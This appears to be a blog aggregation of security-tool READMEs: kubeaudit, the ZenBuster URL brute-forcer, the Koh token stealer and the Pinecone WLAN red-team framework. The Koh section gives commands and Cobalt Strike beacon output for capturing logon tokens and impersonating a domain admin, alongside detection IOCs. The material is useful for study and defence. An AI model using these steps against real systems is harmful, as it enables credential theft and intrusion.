  • Verify volatility plugins work against Linux kernel dumps
  • Add an HTML report that shows all plugins
  • Code refactoring to make more extensible
  • MORE SECRETS


Kubeaudit - Tool To Audit Your Kubernetes Clusters Against Common Security Controls

$
0
0


kubeaudit is a command line tool and a Go package to audit Kubernetes clusters for various different security concerns, such as:

  • run as non-root
  • use a read-only root filesystem
  • drop scary capabilities, don't add new ones
  • don't run privileged
  • and more!

tldr. kubeaudit makes sure you deploy secure containers!

Package

To use kubeaudit as a Go package, see the package docs.

The rest of this README will focus on how to use kubeaudit as a command line tool.

Command Line Interface (CLI)

Installation

Brew

brew install kubeaudit

Download a binary

Kubeaudit has official releases that are blessed and stable: Official releases

DIY build

Master may have newer features than the stable releases. If you need a newer feature not yet included in a release, make sure you're using Go 1.17+ and run the following:

go get -v github.com/Shopify/kubeaudit

Start using kubeaudit with the Quick Start or view all the supported commands.

Kubectl Plugin

Prerequisite: kubectl v1.12.0 or later

With kubectl v1.12.0 introducing easy pluggability of external functions, kubeaudit can be invoked as kubectl audit by

  • running make plugin and having $GOPATH/bin available in your path.

or

  • renaming the binary to kubectl-audit and having it available in your path.

Docker

We also release a Docker image: shopify/kubeaudit. To run kubeaudit as a job in your cluster see Running kubeaudit in a cluster.

Quick Start

kubeaudit has three modes:

  1. Manifest mode
  2. Local mode
  3. Cluster mode

Manifest Mode

If a Kubernetes manifest file is provided using the -f/--manifest flag, kubeaudit will audit the manifest file.

Example command:

kubeaudit all -f "/path/to/manifest.yml"

Example output:

$ kubeaudit all -f "internal/test/fixtures/all_resources/deployment-apps-v1.yml"

---------------- Results for ---------------

apiVersion: apps/v1
kind: Deployment
metadata:
name: deployment
namespace: deployment-apps-v1

--------------------------------------------

-- [error] AppArmorAnnotationMissing
Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/container' should be added.
Metadata:
Container: container
MissingAnnotation: container.apparmor.security.beta.kubernetes.io/container

-- [error] AutomountServiceAccountTokenTrueAndDefaultSA
Message: Default service account with token mounted. automountServiceAccountToken should be set to 'false' or a non-default service account should be used.

-- [error] CapabilityShouldDropAll
Message: Capability not set to ALL. Ideally, you should drop ALL capabilities and add the specific ones you need to the add list.
Metadata:
Container: container
Capability: AUDIT_WRITE
...

If no errors with a given minimum severity are found, the following is returned:

All checks completed. 0 high-risk vulnerabilities found

Autofix

Manifest mode also supports autofixing all security issues using the autofix command:

kubeaudit autofix -f "/path/to/manifest.yml"

To write the fixed manifest to a new file instead of modifying the source file, use the -o/--output flag.

kubeaudit autofix -f "/path/to/manifest.yml" -o "/path/to/fixed"

To fix a manifest based on custom rules specified on a kubeaudit config file, use the -k/--kconfig flag.

kubeaudit autofix -k "/path/to/kubeaudit-config.yml" -f "/path/to/manifest.yml" -o "/path/to/fixed"

Cluster Mode

Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster:

kubeaudit all

Local Mode

Kubeaudit will try to connect to a cluster using the local kubeconfig file ($HOME/.kube/config). A different kubeconfig location can be specified using the --kubeconfig flag. To specify a context of the kubeconfig, use the -c/--context flag.

kubeaudit all --kubeconfig "/path/to/config" --context my_cluster

For more information on kubernetes config files, see https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/

Audit Results

Kubeaudit produces results with three levels of severity:

  • Error: A security issue or invalid kubernetes configuration
  • Warning: A best practice recommendation
  • Info: Informational, no action required. This includes results that are overridden

The minimum severity level can be set using the --minSeverity/-m flag.

By default kubeaudit will output results in a human-readable way. If the output is intended to be further processed, it can be set to output JSON using the --format json flag. To output results as logs (the previous default) use --format logrus. Some output formats include colors to make results easier to read in a terminal. To disable colors (for example, if you are sending output to a text file), you can use the --no-color flag.

If there are results of severity level error, kubeaudit will exit with exit code 2. This can be changed using the --exitcode/-e flag.

For all the ways kubeaudit can be customized, see Global Flags.

Commands

CommandDescriptionDocumentation
allRuns all available auditors, or those specified using a kubeaudit config.docs
autofixAutomatically fixes security issues.docs
versionPrints the current kubeaudit version.

Auditors

Auditors can also be run individually.

CommandDescriptionDocumentation
apparmorFinds containers running without AppArmor.docs
asatFinds pods using an automatically mounted default service accountdocs
capabilitiesFinds containers that do not drop the recommended capabilities or add new ones.docs
deprecatedapisFinds any resource defined with a deprecated API version.docs
hostnsFinds containers that have HostPID, HostIPC or HostNetwork enabled.docs
imageFinds containers which do not use the desired version of an image (via the tag) or use an image without a tag.docs
limitsFinds containers which exceed the specified CPU and memory limits or do not specify any.docs
mountsFinds containers that have sensitive host paths mounted.docs
netpolsFinds namespaces that do not have a default-deny network policy.docs
nonrootFinds containers running as root.docs
privescFinds containers that allow privilege escalation.docs
privilegedFinds containers running as privileged.docs
rootfsFinds containers which do not have a read-only filesystem.docs
seccompFinds containers running without Seccomp.docs

Global Flags

ShortLongDescription
--formatThe output format to use (one of "pretty", "logrus", "json") (default is "pretty")
--kubeconfigPath to local Kubernetes config file. Only used in local mode (default is $HOME/.kube/config)
-c--contextThe name of the kubeconfig context to use
-f--manifestPath to the yaml configuration to audit. Only used in manifest mode. You may use - to read from stdin.
-n--namespaceOnly audit resources in the specified namespace. Not currently supported in manifest mode.
-g--includegeneratedInclude generated resources in scan (such as Pods generated by deployments). If you would like kubeaudit to produce results for generated resources (for example if you have custom resources or want to catch orphaned resources where the owner resource no longer exists) you can use this flag.
-m--minseveritySet the lowest severity level to report (one of "error", "warning", "info") (default is "info")
-e--exitcodeExit code to use if there are results with severity of "error". Conventionally, 0 is used for success and all non-zero codes for an error. (default is 2)
--no-colorDon't use colors in the output (default is false)

Configuration File

The kubeaudit config can be used for two things:

  1. Enabling only some auditors
  2. Specifying configuration for auditors

Any configuration that can be specified using flags for the individual auditors can be represented using the config.

The config has the following format:

enabledAuditors:
# Auditors are enabled by default if they are not explicitly set to "false"
apparmor: false
asat: false
capabilities: true
deprecatedapis: true
hostns: true
image: true
limits: true
mounts: true
netpols: true
nonroot: true
privesc: true
privileged: true
rootfs: true
seccomp: true
auditors:
capabilities:
# add capabilities needed to the add list, so kubeaudit won't report errors
allowAddList: ['AUDIT_WRITE', 'CHOWN']
deprecatedapis:
# If no versions are specified and the'deprecatedapis' auditor is enabled, WARN
# results will be genereted for the resources defined with a deprecated API.
currentVersion: '1.22'
targetedVersion: '1.25'
image:
# If no image is specified and the 'image' auditor is enabled, WARN results
# will be generated for containers which use an ima ge without a tag
image: 'myimage:mytag'
limits:
# If no limits are specified and the 'limits' auditor is enabled, WARN results
# will be generated for containers which have no cpu or memory limits specified
cpu: '750m'
memory: '500m'

For more details about each auditor, including a description of the auditor-specific configuration in the config, see the Auditor Docs.

Note: The kubeaudit config is not the same as the kubeconfig file specified with the --kubeconfig flag, which refers to the Kubernetes config file (see Local Mode). Also note that only the all and autofix commands support using a kubeaudit config. It will not work with other commands.

Note: If flags are used in combination with the config file, flags will take precedence.

Override Errors

Security issues can be ignored for specific containers or pods by adding override labels. This means the auditor will produce info results instead of error results and the audit result name will have Allowed appended to it. The labels are documented in each auditor's documentation, but the general format for auditors that support overrides is as follows:

An override label consists of a key and a value.

The key is a combination of the override type (container or pod) and an override identifier which is unique to each auditor (see the docs for the specific auditor). The key can take one of two forms depending on the override type:

  1. Container overrides, which override the auditor for that specific container, are formatted as follows:
container.audit.kubernetes.io/[container name].[override identifier]
  1. Pod overrides, which override the auditor for all containers within the pod, are formatted as follows:
audit.kubernetes.io/pod.[override identifier]

If the value is set to a non-empty string, it will be displayed in the info result as the OverrideReason:

$ kubeaudit asat -f "auditors/asat/fixtures/service-account-token-true-allowed.yml"

---------------- Results for ---------------

apiVersion: v1
kind: ReplicationController
metadata:
name: replicationcontroller
namespace: service-account-token-true-allowed

--------------------------------------------

-- [info] AutomountServiceAccountTokenTrueAndDefaultSAAllowed
Message: Audit result overridden: Default service account with token mounted. automountServiceAccountToken should be set to 'false' or a non-default service account should be used.
Metadata:
OverrideReason: SomeReason

As per Kubernetes spec, value must be 63 characters or less and must be empty or begin and end with an alphanumeric character ([a-z0-9A-Z]) with dashes (-), underscores (_), dots (.), and alphanumerics between.

Multiple override labels (for multiple auditors) can be added to the same resource.

See the specific auditor docs for the auditor you wish to override for examples.

To learn more about labels, see https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/

Contributing

If you'd like to fix a bug, contribute a feature or just correct a typo, please feel free to do so as long as you follow our Code of Conduct.

  1. Create your own fork!
  2. Get the source: go get github.com/Shopify/kubeaudit
  3. Go to the source: cd $GOPATH/src/github.com/Shopify/kubeaudit
  4. Add your forked repo as a fork: git remote add fork https://github.com/you-are-awesome/kubeaudit
  5. Create your feature branch: git checkout -b awesome-new-feature
  6. Install Kind
  7. Run the tests to see everything is working as expected: make test (to run tests without Kind: USE_KIND=false make test)
  8. Commit your changes: git commit -am 'Adds awesome feature'
  9. Push to the branch: git push fork
  10. Sign the Contributor License Agreement
  11. Submit a PR (All PR must be labeled with
    (Bug fix),
    (New feature),
    (Documentation update), or
    (Breaking changes) )
  12. ???
  13. Profit

Note that if you didn't sign the CLA before opening your PR, you can re-run the check by adding a comment to the PR that says "I've signed the CLA!"!



Zenbuster - Multi-threaded URL Enumeration/Brute-Forcing Tool

$
0
0


ZenBuster is a multi-threaded, multi-platform URL enumeration tool written in Python by Zach Griffin (@0xTas).

I wrote this tool as a way to deepen my familiarity with Python, and to help increase my understanding of Cybersecurity tooling in general. ZenBuster may not be the fastest or most comprehensive tool of its kind. It is however, simple to use, decently flexible, and in practice only marginally slower than other "tried-and-true" tools like Gobuster. Personally, I have been using it to help me solve CTF challenges on platforms like TryHackMe, and have found my implementation to be satisfactorily reliable.

This software is intended for use in CTF challenges, or by security professionals to gather information on their targets:

  • It is capable of brute-force enumerating subdomains and also URI resources (directories/files).
  • Both methods of enumeration require use of an appropriate wordlist or dictionary file.
  • Features Include:
    1. Hostname format supports standard, IPv4, and IPv6.
    2. Support for logging results to a file with -O [filename].
    3. Specifying custom ports for nonstandard webservers with -p .
    4. Optional file extensions in directory mode with -x .
    5. Quiet mode for less distracting output with -Q.
    6. Color can be disabled for less distracting output with -nc/-nl.
    7. Tested on Python versions 3.9 and 3.10, with theoretical support for versions >= 3.6

CAUTION/DISCLAIMER

ZenBuster is capable of producing a potentially unwelcome number of HTTP requests in a short amount of time.

The developers and contributors are not liable or responsible for any damage caused by misuse or abuse of this software.

Please Enumerate Responsibly!

License

Multi-threaded URL enumeration/brute-forcing tool in Python. (5)

ZenBuster is licensed under the GNU GPLv3 License, see here for more information.

Credits

Yin-Yang ASCII art in the banners were created by Joan G. Stark (jgs) and Hayley Jane Wakenshaw (hjw). Modifications were made by me, when specified with: 'zg'.


Installation

Firstly, ensure that Python version >= 3.6 is installed, then clone the repository with:

git clone https://github.com/0xTas/zenbuster.git

Next, cd zenbuster.

Dependencies

ZenBuster relies on 3 external libraries to function, and it is recommended to install these with:

pip install -r requirements.txt

The modules that will be installed and their purposes are as follows:

  1. Python requests

    • The backbone of each enumeration request. Without this, the script will not function.
  2. termcolor

    • Enables colored terminal output. Non-critical, the script can still run without color if this is not present.
  3. colorama (Windows only)

    • Primes the Windows terminal to accept ANSI color codes (from Termcolor). Non-critical.

These dependencies may be installed manually, with pip using requirements.txt, or via interaction with the script upon first run.


Usage

Once dependencies have been installed, you can run the program in the following ways:

On Linux (+Mac?):

./zenbuster.py [options]orpython3 zenbuster.py [options]

On Windows:

python zenbuster.py [options]

[Options]

Short FlagLong FlagPurpose
-h--helpDisplays the help screen and exits
-d--dirsEnables Directory Enumeration Mode
-s-sslForces usage of HTTPS in requests
-v--verbosePrints verbose info to terminal/log
-q--quietMinimal terminal output until final results
-nc--no-colorDisables colored terminal output
-nl--no-lolcatDisables lolcat-printed banner (Linux only)
-u <hostname>--hostHost to target for the scan
-w <wordlist>--wordlistPath to wordlist/dictionary file
-x <exts>--extComma-separated list of file extensions (Dirs only)
-p <port#>--portCustom port option for nonstandard webservers
-o [filename]--out-fileLog results to a file (accepts custom name/path)

Example Usage

./zenbuster.py -d -w /usr/share/wordlists/dirb/common.txt -u target.thm -v

python3 zenbuster.py -w ../subdomains.txt --host target.thm --ssl -O myResults.log

zenbuster -w subdomains.txt -u target.thm --quiet (With .bashrc alias)


Planned Features/Improvements

  • Increased levels of optional verbosity.
  • Allow optional throttling of task thread-count.
  • Allow users to modify the list of ignored status codes.
  • Allow greater user control over various request headers.
  • Allow optional ignoring of responses based on content-length.
  • Expand subdomain enumeration to include OSINT methods instead of just brute-forcing.
  • Explore a more comprehensive and source-readable solution to fancy colored output (possibly using rich).

Known Issues/Limitations

  • Enumerating long endpoints may result in ugly terminal output due to line-wraping on smaller console windows. Logging to a file is recommended, especially on Windows.
  • If target host is a vHost on a shared webserver, enumeration via IP may not function as expected. Use domain/hostname instead.


Koh - The Token Stealer

$
0
0


Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.

Some code was inspired by Elad Shamir's Internal-Monologue project (no license), as well as KB180548. For why this is possible and Koh's approeach, see the Technical Background section of this README.

For a deeper explanation of the motivation behind Koh and its approach, see the Koh: The Token Stealer post.

@harmj0y is the primary author of this code base. @tifkin_ helped with the approach, BOF implementation, and some token mechanics.

Koh is licensed under the BSD 3-Clause license.


Koh Server

The Koh "server" captures tokens and uses named pipes for control/communication. This can be wrapped in Donut and injected into any high-integrity SYSTEM process (see The Inline Shenanigans Bug).

Compilation

We are not planning on releasing binaries for Koh, so you will have to compile yourself :)

Koh has been built against .NET 4.7.2 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build. The Koh.exe assembly and Koh.binDonut-built PIC will be output to the main directory. The Donut blob is both x86/x64 compatible, and is built with the following options using v0.9.3 of Donut at ./Misc/Donut.exe:

  [ Instance type : Embedded
[ Entropy : Random names + Encryption
[ Compressed : Xpress Huffman
[ File type : .NET EXE
[ Parameters : capture
[ Target CPU : x86+amd64
[ AMSI/WDLP : abort

Donut's license is BSD 3-clause.

Usage

Koh.exe Koh.exe <list | monitor | capture> [GroupSID... GroupSID2 ...]

  • list - lists (non-network) logon sessions
  • monitor - monitors for new/unique (non-network) logon sessions
  • capture - captures one unique token per SID found for new (non-network) logon sessions

Group SIDs can be supplied command line as well, causing Koh to monitor/capture only logon sessions that contain the specified group SIDs in their negotiated token information.

Example - Listing Logon Sessions

C:\Temp>Koh.exe list

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: list

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Origin LUID : 1677733 (0x1999a5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Example - Monitoring for Logon Sessions (with group SID filtering)

Only lists results that have the domain admins (-512) group SID in their token information:

C:\Temp>Koh.exe monitor S-1-5-21-937929760-3187473010-80948926-512

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: monitor

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM

[*] Targeting group SIDs:
S-1-5-21-937929760-3187473010-80948926-512

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492608
Lo gonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Koh Client

The current usable client is a Beacon Object File at .\Clients\BOF\. Load the .\Clients\BOF\KohClient.cna aggressor script in your Cobalt Strike client to enable BOF control of the Koh server. The only requirement for using captured tokens is SeImpersonatePrivilege. The communication named pipe has an "Everyone" DACL but uses a basic shared password (super securez).

To compile fresh on Linux using Mingw, see the .\Clients\BOF\build.sh script. The only requirement (on Debian at least) should be apt-get install gcc-mingw-w64

Usage

beacon> help koh
koh list - lists captured tokens
koh groups LUID - lists the group SIDs for a captured token
koh filter list - lists the group SIDs used for capture filtering
koh filter add SID - adds a group SID for capture filtering
koh filter remove SID - removes a group SID from capture filtering
koh filter reset - resets the SID group capture filter
koh impersonate LUID - impersonates the captured token with the give LUID
koh release all - releases all captured tokens
koh release LUID - releases the captured token for the specified LUID
koh exit - signals the Koh server to exit

Group SID Filtering

The koh filter add S-1-5-21-<DOMAIN>-<RID> command will only capture tokens that contain the supplied group SID. This command can be run multiple times to add additional SIDs for capture. This can help prevent possible stability issues due to a large number of token leaks.

Example - Capture

"Captures" logon sessions by negotiating usable tokens for each new session.

Server:

C:\Temp>Koh.exe capture

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: capture

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Credential UserName : testuser@THESHIRE.LOCAL
Origin LUID : 1677733 (0x1999a5)

[*] Successfully negotiated a token for LUID 207990196 (hToken: 848)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Credential UserName : da@THESHIRE.LOCAL
Origin LUID : 1677765 (0x1999c5)

[*] Successfully negotiated a token for LUID 81492692 (hToken: 976)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Credential UserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999 (0x3e7)

[*] Successfully negotiated a token for LUID 1677733 (hToken: 980)

BOF client:

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Access is denied.

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> koh list
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:

Username : THESHIRE\localadmin (S-1-5-21-937929760-3187473010-80948926-1000)
LUID : 67556826
CaptureTime : 6/21/2022 1:24:42 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : localadmin@THESHIRE.LOCAL
Origin LUID : 1676720

Username : THESHIRE\da (S-1-5-21-937929760-3187473010-80948926-1145)
LUID : 67568439
CaptureTime : 6/21/2022 1:24:50 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : da@THESHIRE.LOCAL
Origin LUID : 1677765

Username : THESHIRE\harmj0y (S-1-5-21-937929760-3187473010-80948926-1104)
LUID : 1677733
CaptureTime : 6/21/2022 1:23:10 PM
LogonType : Interactive
AuthPackage : Kerberos
CredUserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999

beacon> koh groups 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
S-1-5-21-937929760-3187473010-80948926-513
S-1-5-21-937929760-3187473010-80948926-512
S-1-5-21-937929760-3187473010-80948926-525
S-1-5-21-937929760-3187473010-80948926-572

beacon> koh impersonate 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
[*] Enabled SeImpersonatePrivilege

[+] received output:
[*] Creating impersonation named pipe: \\.\pipe\imposingcost

[+] received output:
[*] Impersonation succeeded. Duplicating token.

[+] received output:
[*] Impersonated token successfully duplicated.

[+] Impersonated THESHIRE\da

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are THESHIRE\DA (admin)

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Volume in drive \\dc.theshire.local\C$ has no label.
Volume Serial Number is A4FF-7240

Directory of \\dc.theshire.local\C$

01/04/2021 11:43 AM <DIR> inetpub
05/30/2019 03:08 PM <DIR> Pe rfLogs
05/18/2022 01:27 PM <DIR> Program Files
04/15/2021 09:44 AM <DIR> Program Files (x86)
03/20/2020 12:28 PM <DIR> RBFG
10/20/2021 01:14 PM <DIR> Temp
05/23/2022 06:30 PM <DIR> tools
03/11/2022 04:10 PM <DIR> Users
06/21/2022 01:30 PM <DIR> Windows
0 File(s) 0 bytes
9 Dir(s) 40,504,201,216 bytes free

Technical Background

When a new logon session is estabslished on a system, a new token for the logon session is created by LSASS using the NtCreateToken() API call and returned by the caller of LsaLogonUser(). This increases the ReferenceCount field of the logon session kernel structure. When this ReferenceCount reaches 0, the logon session is destroyed. Because of the information described in the Why This Is Possible section, Windows systems will NOT release a logon session if a token handle still exists to it (and therefore the reference count != 0).

So if we can get a handle to a newly created logon session via a token, we can keep that logon session open and later impersonate that token to utilize any cached credentials it contains.

Why This Is Possible

According to this post by a Microsoft engineer:

After MS16-111, when security tokens are leaked, the logon sessions associated with those security tokens also remain on the system until all associated tokens are closed... even after the user has logged off the system. If the tokens associated with a given logon session are never released, then the system now also has a permanent logon session leak as well.

MS16-111 was applied back to Windows 7/Server 2008, so this approach should be effective for everything except Server 2003 systems.

Approach

Enumerating logon sessions is easy (from an elevated context) through the use of the LsaEnumerateLogonSessions() Win32 API. What is more difficult is taking a specific logon session identifier (LUID) and somehow getting a usable token linked to that session.

Possible Approaches

We brainstormed a few ways to a) hold open logon sessions and b) abuse this for token impersonation/use of cached credentials.

  1. The first approach was to use NtCreateToken() which allows you to specify a logon session ID (LUID) to create a new token.
    • Unfortunately, you need SeCreateTokenPrivilege which is traditionally only held by LSASS, meaning you need to steal LSASS' token which isn't ideal.
    • One possibility was to add SeCreateTokenPrivilege to NT AUTHORITY\SYSTEM via LSA policy modification, but this would need a reboot/new logon session to express the new user rights.
  2. You can also focus on just RemoteInteractive logon sessions by using WTSQueryUserToken() to get tokens for new desktop sessions to clone.
    • This is the approach apparently demonstrated by Ryan.
    • Unfortunately this misses newly created local sessions and incoming sessions created from things like PSEXEC.
  3. On a new logon session, open up a handle to every reachable process and enumerate all existing handles, cloning the token linked to the new logon session.
    • This requires opening up lots of processes/handles, which looks very suspicious.
  4. The AcquireCredentialsHandle()/InitializeSecurityContext()/AcceptSecurityContext() approach described below, which is what we went with.

Our Approach

The SSPI AcquireCredentialsHandle() call has a pvLogonID field which states:

A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. 

Note: In order to utilize a logon session LUID with AcquireCredentialsHandle() you need SeTcbPrivilege, however this is usually easier to get than SeCreateTokenPrivilege.

Using this call while specifying a logon session ID/LUID appears to increase the ReferenceCount for the logon session structure, preventing it from being released. However, we're not presented with another problem: given a "leaked"/held open logon session, how do we get a usable token from it? WTSQueryUserToken() only works with desktop sessions, and there's no userland API that we could find that lets you map a LUID to a usable token.

However we can use two additional SSPI functions, InitializeSecurityContext() and AcceptSecurityContext() to act as client and server to ourselves, negotiating a new security context that we can then use with QuerySecurityContextToken() to get a usable token. This was documented in KB180548 (mirrored by PKISolutions here) for the purposes of credential validation. This is a similar approach to Internal-Monologue, except we are completing the entire handshake process, producing a token, and then holding that for later use.

Filtering can then be done on the token itself, via CheckTokenMembership() or GetTokenInformation(). For example, we could release any tokens except for ones belonging to domain admins, or specific groups we want to target.

Advantages/Disadvantages Versus Traditional Credential Extraction

Advantages

  • Works for both local and inbound (non-network) logons.
  • Works for inbound sessions created via Kerberos and NTLM.
  • Doesn’t require opening up a handle to multiple processes.
  • Doesn't create a new logon event or logon session.
  • Doesn't create additional event logs on the DC outside of normal system ticket renewal behavior (I don't think?)
  • No default lifetime on the tokens (I don't think?) so access should work as long as the captured account’s credentials don't change and the system doesn’t reboot.
  • Reuses legitimate captured auth on a system, so should "blend with the noise" reasonably well.

Disadvantages

  • Access is only usable as long as the system doesn't reboot.
  • Doesn't let you reuse access on other systems
    • However, and existing ticket/credential extraction can still be done on the leaked logon session.
  • May cause instability if a large number of sessions are leaked (though this can be mitigated with token group SID filtering) and restricting the maximum number of captured tokens (default of 1000 here).

The Inline Shenanigans Bug

I've been coding for a decent amount of time. This is one of the weirder and frustrating-to-track-down bugs I've hit in a while - please help me with this lol.

  • When the Koh.exe assembly is run from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run via Cobalt Strike's Beacon fork&run process with execute-assembly from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in a SYSTEM context, everything works properly.

  • However If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in an elevated, but not SYSTEM, context, the call to AcquireCredentialsHandle() fails with SEC_E_NO_CREDENTIALS and everything fails ¯\_(ツ)_/¯

We have tried (with no success):

  • Spinning off everything to a separate thread, specifying a STA thread apartment.
  • Trying to diagnose RPC weirdness (still more to investigate here).
  • Using DuplicateTokenEx and SetThreadToken instead of ImpersonateLoggedOnUser.
  • Checking if we have the proper SeTcbPrivilege right before the AcquireCredentialsHandle call (we do).

For all intents and purposes, the thread context right before the call to AcquireCredentialsHandle works in this context, but the result errors out. And we have no idea why.

If you have an idea of what this might be, please let us know! And if you want to try playing around with a simpler assembly, check out the AcquireCredentialsHandle repo on my GitHub for troubleshooting.

IOCs

To quote @tifkin_"Everything is stealthy until someone is looking for it." While Koh's approach is slightly different than others, there are still IOCs that can be used to detect it.

The unique TypeLib GUID for the C# Koh collector is 4d5350c8-7f8c-47cf-8cde-c752018af17e as detailed in the Koh.yar Yara rule in this repo. If this is not changed on compilation, it should be a very high fidelity indicator of the Koh server.

When the Koh server starts is opens up a named pipe called \\.\pipe\imposecost that stays open as long as Koh is running. The default password used for Koh communication is password, so sending password list to any \\.\pipe\imposecost pipe will let you confirm if Koh is indeed running. The default impersonation pipe used is \\.pipe\imposingcost.

If Koh starts in an elevated context but not as SYSTEM, a handle/token clone of winlogon is performed to perform a getsystem type elevation.

I'm sure that no attackers will change the indicators mentioned above.

There are likely some RPC artifacts for the token capture that we're hoping to investigate. We will update this section of the README if we find any additional detection artifacts along these lines. Hooking of some of the possibly-uncommon APIs used by Koh (LsaEnumerateLogonSessions or the specific AcquireCredentialsHandle/InitializeSecurityContext/AcceptSecurityContext, specifically using a LUID in AcquireCredentialsHandle) could be explored for effectiveness, but alas, I am not an EDR.

TODO

  • Additional testing in the lab and field. Possible concerns:
    • Stability in production environments, specifically intentional token leakage causing issues on highly-trafficked servers
    • Total actual effective token lifetime
  • "Remote" client that allows for monitoring through the Koh named pipe remotely
  • Implement more clients (PowerShell, C#, C++, etc.)
  • Fix the Inline Shenanigans Bug


Pinecone - A WLAN Red Team Framework

$
0
0


Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python3 already installed, if not it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

root@kali:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

